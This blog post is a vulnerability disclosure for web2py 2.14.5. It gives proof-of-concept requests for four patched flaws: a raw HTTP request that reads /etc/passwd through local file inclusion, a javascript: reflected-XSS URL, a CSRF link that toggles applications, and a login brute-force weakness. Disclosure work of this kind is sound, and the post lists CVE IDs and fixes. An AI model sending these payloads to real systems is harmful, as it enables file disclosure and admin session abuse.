Sunday, 15 May 2016

Web2py Vulnerabilities 2.14.5 : LFI,XSS,CSRF,Brute Force Attack

Web2py Vulnerabilities


This post is about Web2py  Vulnerabilities which we have found, POC`s are created under Mac OS X EI Capitan, But also tested on windows 7 as well as linux platform.

#Download the vulnerable Apphttps://drive.google.com/file/d/0B-LjC3oY6tUpZlNkV3BnZU85Y0E/view?usp=sharing
# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF, Brute Force On Login
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808, Login Brute Force - CVE-2016-10321
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/imnarendrabhati
# Twitter : http://twitter.com/imnarendrabhati



Additional Links/Information

LFI :https://github.com/web2py/web2py/pull/1317/files

  • POST URI - /admin/default/pack_custom/[applicationmame]

  • Vulnerable Parameter = file

  • Exploit - file=/etc/passwd

  • Authentication Required = Yes(Administrator)

Reflected XSS https://github.com/web2py/web2py/commit/51c3b633fe7ad647bc3013e899c1e3a910362dd1

  • GET URI  - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl

  • Vulnerable Parameter - source

  • Exploit - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=javascript:alert(1)

  • Authentication Required - Yes(Administrator)

CSRF : https://github.com/web2py/web2py/commit/4bd002aee978813bc664cf186ef38ff4e8bbe1cd

  • GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]

  • Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]

  • Authenticated Required - Yes(Administrator)

=======================================================

# Detailed POC - 

Web2py 2.14.5 LFI Vulnerability : CVE-2016-4806

Technical Details

Parameter "file" was vulnerable for LFI.
POST /admin/default/pack_custom/dasdasdasdad HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213

file=/etc/passwd





After sending this request, Application will prompt a file to download as an extension of "w2p".





Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker



After unpacking this file, You will able to read the "passwd" file.



POC Video




======================================================

Web2py 2.14.5 Reflected XSS Vulnerability : CVE-2016-4807

Once victim execute this link - http://127.0.0.1:8000/admin/default/install_plugin/applicationname?plugin=math2py&source=javascript:alert(1)

the value of parameter "source" will get reflected in "href" tag, When victim click on "here" button the Javascript will get execute.







POC Video


======================================================



Web2py 2.14.5 CSRF Vulnerability : CVE-2016-4808

Due this vulnerability, An attacker can trick an admin to enable or disable installed applications.

Installed application will get enable if it is already disable and vice versa , If authenticate admin execute this link - http://127.0.0.1:8000/admin/default/enable/[applicationname]
POC Video




Detailed POC - 

Web2py 2.14.5 Brute Force Attack Vulnerability : CVE-2016-10321

Technical Details

web2py before 2.14.6 does not properly check if a host is denied before verifying passwords, allowing remote attacker to perform brute-force attacks.

POC : An attacker can brute force the admin panel password from the same network where the Web2py is hosted. Hence web2py before 2.14.6 was not preventing the failed login attempt from if the login request came from the same network where the web2py is hosted.

POC Screen Shot.

Multiple Login Password As Payload





Intruder Attack Result.



Added as a contributor in Web2py, Thanks to Web2py Team





Comments are always welcome.

No comments:

Post a Comment